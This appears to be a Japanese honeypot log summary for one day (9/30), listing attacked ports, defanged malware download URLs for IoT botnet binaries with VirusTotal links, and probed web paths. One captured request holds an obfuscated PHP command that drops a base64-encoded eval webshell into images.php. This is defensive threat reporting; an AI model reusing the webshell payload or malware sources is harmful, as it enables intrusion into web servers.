ハニーポット簡易分析(52日目:9/30)
9/30 日分の検知ログとなりますが、今回は新規の検知がほとんどなく、補足で説明することもないような平和な検知状況でした。
9/30 5,099件 (Honeytrap)
◾️宛先ポート別(80ポートを除く)
| ポート | 件数 | 割合 | サービス |
| 445 | 1,382 | 27.10% | SMB |
| 3389 | 381 | 7.47% | RDP |
| 22 | 156 | 3.06% | SSH |
| 222 | 93 | 1.82% | SSH |
| 6379 | 91 | 1.79% | Redis |
| 2222 | 83 | 1.63% | SSH |
| 8022 | 76 | 1.49% | ? |
| 81 | 71 | 1.39% | GoAhead Web Server |
| 1433 | 65 | 1.28% | Microsoft SQL Server |
| 52869 | 63 | 1.24% | D-Link, Realtek SDK |
◾️マルウェアダウンロード先
| 宛先ポート | マルウェアURL | 検知数 | VT |
| 5555 | hxxp://185[.]162[.]130[.]187/adbs2 | 1 | https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/ |
| 5555 | hxxp://188[.]209[.]52[.]142/c | 34 | https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection |
| 5555 | hxxp://95[.]215[.]62[.]169/adbs | 2 | https://www.virustotal.com/ja/url/d3c48b0b640ab29a353400425a1fa2e02a39983ea20c6ab70f67047d7013fcd5/analysis/ |
| 52869 | hxxp://104[.]248[.]189[.]214/tenshimips[.]mips | 33 | https://www.virustotal.com/#/url/cdb167260bf09c1b74b5fb932fd1647ba437f9b72a33317dc7ed81167beeed1e/detection |
| 52869 | hxxp://107[.]191[.]99[.]230/elf[.]mips | 19 | https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection |
| 52869 | hxxp://194[.]182[.]65[.]56/bins/apep[.]mips | 1 | https://www.virustotal.com/#/file/a0925fc32573e5f4edfbf4d321ebd9813f3f598c22d8e23105d1b3ab33c0cc1a/detection |
◾️WoWHoneypotの検知状況
| Method | path | 検知数 |
| GET | / | 33 |
| GET | /.git/HEAD | 3 |
| GET | /?XDEBUG_SESSION_START=phpstorm | 1 |
| GET | /HNAP1/ | 1 |
| GET | /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! | 1 |
| GET | /console | 3 |
| GET | /phpMyAdmin-3.0.1.1/scripts/setup.php | 13 |
| GET | /phpMyAdmin/scripts/setup.php | 3 |
| GET | /phpmyadmin/scripts/setup.php | 3 |
| GET | /phpmyadmin3/scripts/setup.php | 12 |
| GET | /pma/scripts/setup.php | 3 |
| GET | /rgs.mng | 1 |
| GET | /scripts/setup.php | 3 |
| GET | /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr | 1 |
| GET | http://112.35.88.28:10083/index.php | 1 |
| HEAD | / | 1 |
| HEAD | /static/admin/images/login_logo.png | 4 |
| POST | /cmx.php | 1 |
| POST | /images.php | 1 |
| POST |
hxxp://check.proxyradar.com/azenv.php?auth=153823774681&a=PSCN&i=2685440439&p=80 |
1 |
以上、簡易分析となります。
